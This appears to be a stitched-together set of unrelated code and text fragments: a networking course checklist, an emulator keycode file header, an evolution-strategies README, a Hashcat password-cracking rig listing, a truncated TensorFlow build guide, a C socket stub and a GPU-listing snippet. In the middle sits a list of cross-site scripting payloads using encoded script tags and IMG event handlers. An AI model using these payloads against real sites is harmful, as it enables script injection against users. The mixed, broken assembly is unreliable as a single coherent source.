This will be the engineering journal that i will write during my journey with Cisco Networking Academy. | |
1 - DONE | |
2 - DONE | |
3 - DONE | |
4 - DONE | |
5 - DONE | |
6 - DONE | |
7 - DONE | |
8 - DONE |
# /usr/share/BasiliskII/keycodes | |
# | |
# Basilisk II (C) 1997-2005 Christian Bauer | |
# | |
# This file is used to translate the (server-specific) scancodes to | |
# Mac keycodes depending on the window server being used. | |
# | |
# The format of this file is as follows: | |
# | |
# sdl <driver string> |
#Evolution Strategies with Keras | |
#Based off of: https://blog.openai.com/evolution-strategies/ | |
#Implementation by: Nicholas Samoray | |
#README | |
#Meant to be run on a single machine | |
#APPLY_BIAS is currently not working, keep to False | |
#Solves Cartpole as-is in about 50 episodes | |
#Solves BipedalWalker-v2 in about 1000 |

Product: Sagitta Brutalis 1080 Ti (SKU N4X48-GTX1080TI-2620-128-2X500)
Software: Hashcat 3.5.0-22-gef6467b, Nvidia driver 381.09
Accelerator: 8x Nvidia GTX 1080 Ti Founders Edition
The official instructions on installing TensorFlow are here: https://www.tensorflow.org/install. If you want to install TensorFlow just using pip, you are running a supported Ubuntu LTS distribution, and you're happy to install the respective tested CUDA versions (which often are outdated), by all means go ahead. A good alternative may be to run a Docker image.
I am usually unhappy with installing what in effect are pre-built binaries. These binaries are often not compatible with the Ubuntu version I am running, the CUDA version that I have installed, and so on. Furthermore, they may be slower than binaries optimized for the target architecture, since certain instructions are not being used (e.g. AVX2, FMA).
So installing TensorFlow from source becomes a necessity. The official instructions on building TensorFlow from source are here: ht
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
#include <arpa/inet.h> | |
#include <stdio.h> | |
#include <string.h> | |
#include <sys/socket.h> | |
#include <unistd.h> | |
int main() { | |
const char* server_name = "localhost"; | |
const int server_port = 8877; |
from tensorflow.python.client import device_lib | |
def get_available_gpus(): | |
local_device_protos = device_lib.list_local_devices() | |
return [x.name for x in local_device_protos if x.device_type == 'GPU'] | |
get_available_gpus() |